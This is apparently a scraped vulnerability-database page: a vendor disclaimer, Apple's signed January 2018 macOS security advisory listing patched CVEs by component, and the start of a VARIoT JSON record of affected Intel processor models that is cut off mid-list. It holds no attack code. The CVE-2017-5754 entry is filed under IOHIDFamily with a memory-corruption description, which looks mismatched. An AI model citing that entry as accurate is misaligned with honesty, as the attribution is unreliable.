Micro Focus shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither Micro Focus nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Micro Focus and the names of Micro Focus products referenced herein are trademarks of Micro Focus in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

APPLE-SA-2018-1-23-2 macOS High Sierra 10.13.3, Security Update 2018-001 Sierra, and Security Update 2018-001 El Capitan

macOS High Sierra 10.13.3, Security Update 2018-001 Sierra, and Security Update 2018-001 El Capitan are now available and address the following:

Audio Available for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6 Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2018-4094: Mingi Cho, MinSik Shin, Seoyoung Kim, Yeongho Lee and Taekyoung Kwon of the Information Security Lab, Yonsei University

curl Available for: macOS High Sierra 10.13.2 Impact: Multiple issues in curl Description: An out-of-bounds read issue existed in the curl. This issue was addressed through improved bounds checking. CVE-2017-8817: found by OSS-Fuzz

IOHIDFamily Available for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6, OS X El Capitan 10.11.6 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)

Kernel Available for: macOS High Sierra 10.13.2 Impact: An application may be able to read restricted memory Description: A memory initialization issue was addressed through improved memory handling. CVE-2018-4090: Jann Horn of Google Project Zero

Kernel Available for: macOS High Sierra 10.13.2 Impact: An application may be able to read restricted memory Description: A race condition was addressed through improved locking. CVE-2018-4092: an anonymous researcher

Kernel Available for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6, OS X El Capitan 10.11.6 Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-2018-4082: Russ Cox of Google

Kernel Available for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A logic issue was addressed with improved validation. CVE-2018-4097: Resecurity, Inc.

Kernel Available for: macOS High Sierra 10.13.2 Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2018-4093: Jann Horn of Google Project Zero

LinkPresentation Available for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6.2 Impact: Processing a maliciously crafted text message may lead to application denial of service Description: A resource exhaustion issue was addressed through improved input validation. CVE-2018-4100: Abraham Masri (@cheesecakeufo)

QuartzCore Available for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6, OS X El Capitan 10.11.6 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of web content. This issue was addressed through improved input validation. CVE-2018-4085: Ret2 Systems Inc. working with Trend Micro's Zero Day Initiative

Sandbox Available for: macOS High Sierra 10.13.2 Impact: A sandboxed process may be able to circumvent sandbox restrictions Description: An access issue was addressed through additional sandbox restrictions. CVE-2018-4091: Alex Gaynor of Mozilla

Security Available for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6 Impact: A certificate may have name constraints applied incorrectly Description: A certificate evaluation issue existed in the handling of name constraints. This issue was addressed through improved trust evaluation of certificates. CVE-2018-4086: Ian Haken of Netflix

WebKit Available for: macOS High Sierra 10.13.2 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4088: Jeonghoon Shin of Theori CVE-2018-4089: Ivan Fratric of Google Project Zero CVE-2018-4096: found by OSS-Fuzz

Wi-Fi Available for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6, OS X El Capitan 10.11.6 Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2018-4084: Hyung Sup Lee of Minionz, You Chan Lee of Hanyang University

Installation note:

macOS High Sierra 10.13.3, Security Update 2018-001 Sierra, and Security Update 2018-001 El Capitan may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/

Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE-----

iQJdBAEBCgBHFiEEcuX4rtoRe4X62yWlg6PvjDRstEYFAlpnnmApHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQg6PvjDRstEZaqg/8 DAjzEHmWMZxkSl88DnX/Y9x39DQ1eV6O0Bsg/WQ2r6wZlRDnBOYdJtgJU0I9MjgT JjOj6M/l+YkVS3EJHcdQqAZ6RfSSMvIcRieHJ0Lfj6bfohKRLJxuloFVKar3lAsY fIdzqlFKqWvPY6Neto2iR7ZhTWDW7QiVwbgSR1fleEWEglWtTeJjL6mff73Mqexh 7VngVFIicrbjoFD7uY2dctgkP+no3dcFieyRWF/z8OAmAOIkAc/KMqFyj22DBDq5 hH1j07Eo0RLKMT+nPq3Vgir5JVVR68M4UvDnSDXGHmTRYaM2BT8osWqlehgFQ52F JhqAsJsKP1Mc9WZkly8OvBbZHJcIJryTSqytOOZRQuvg6fXHPOezajcpThTntGiI /YcmaFIt8bZ8c0GbQXTMY8YCJEHtG3zb/z+Wf0sABfzbtCt48e5CQD5HDsoZyiML J84Sbs1Lb5XFYsdZg5iUFukIJRqYwaf69BUgMmFPTOxkBL/KH7m4BmUtLeiStLYN ykdW2TQFEbM6ojPL9HrAyho0wdX2/G4jiemAk22fb/XQ6q9+57RyduE/MDiFW93a 2XcIzxlsRk37ISIPyEkQTF/L/DTMdnhgI+ZIwmaMwU8Hd48MMMg6MIWYctefvnyB a1pVFFlwHCfxBWYSVI2fkKwExlNNYXCOjGsN7TSBfNc= =pc7O -----END PGP SIGNATURE-----

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201801-1711",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5287u"
      },
      {
        "model": "xeon e5 2470 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2687w_v2"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3450"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5540"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2655le"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8880l_v3"
      },
      {
        "model": "xeon e3 1270 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4669_v4"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4350u"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e6510"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2435m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "875k"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5503"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6148"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4980hq"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4360"
      },
      {
        "model": "xeon e5 1660 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3850"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5687"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2617m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3770"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "ec5509"
      },
      {
        "model": "xeon e3 1260l v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2695_v3"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "670"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4422e"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2718"
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1585l_v5"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3230m"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5518"
      },
      {
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j4005"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3317u"
      },
      {
        "model": "xeon e3 1226 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1241 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4870"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2699_v4"
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1535m_v5"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4900mq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3612qm"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3380m"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2690_v4"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4330m"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8867l"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2687w_v3"
      },
      {
        "model": "xeon e-1105c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4012y"
      },
      {
        "model": "xeon e5 1650",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670r"
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7250"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4722hq"
      },
      {
        "model": "xeon e3 1501m v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core m3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6y30"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4790t"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4809_v4"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8880_v4"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6154"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3220"
      },
      {
        "model": "xeon e5 2448l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8160t"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2312m"
      },
      {
        "model": "xeon e3 1285l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4655_v4"
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8180"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6300t"
      },
      {
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3405"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3350"
      },
      {
        "model": "xeon e3 1230 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8891_v3"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5638"
      },
      {
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j1750"
      },
      {
        "model": "xeon e5 2403",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6350hq"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8860"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6146"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570r"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5550"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6140"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3350p"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5630"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6136"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "980"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4120u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "w5580"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "820qm"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2640m"
      },
      {
        "model": "xeon e3 1280 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "w3680"
      },
      {
        "model": "core m3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7y30"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2850"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2338"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5122"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4809_v3"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4160"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4657l_v2"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4158u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6400t"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4960hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5750hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "640um"
      },
      {
        "model": "xeon e3 1230 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4360u"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4830_v3"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4627_v4"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l7555"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6142m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3667u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4300y"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3160"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2367m"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3740"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4130"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6102e"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "560um"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4460s"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3687u"
      },
      {
        "model": "xeon e3 1225 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100u"
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y10"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5618"
      },
      {
        "model": "xeon e5 2418l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2648l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3827"
      },
      {
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4114t"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610"
      },
      {
        "model": "xeon e5 2618l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2806"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2350m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3340s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6200u"
      },
      {
        "model": "xeon e5 2440",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2603 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7210"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2890_v2"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x6550"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8250u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2348m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4690t"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4771"
      },
      {
        "model": "xeon e3 1285 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6130f"
      },
      {
        "model": "xeon e5 2618l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2640 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2618l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j1850"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6134"
      },
      {
        "model": "xeon e3 1276 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3460"
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1575m_v5"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2690"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4627_v3"
      },
      {
        "model": "xeon e3 1240 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2620 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4702mq"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4627_v2"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2820qm"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4807"
      },
      {
        "model": "xeon e5 2407 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4712mq"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2380p"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2115c"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2520m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "680um"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "640m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2715qe"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3227u"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2820"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "430um"
      },
      {
        "model": "xeon e5 2430l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4860_v2"
      },
      {
        "model": "xeon e5 1620 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2910"
      },
      {
        "model": "pentium j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j2900"
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1585_v5"
      },
      {
        "model": "xeon e3 1105c v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1265l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8550u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "530"
      },
      {
        "model": "xeon e5 2428l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4809_v2"
      },
      {
        "model": "core i3",
        "scope": "eq",
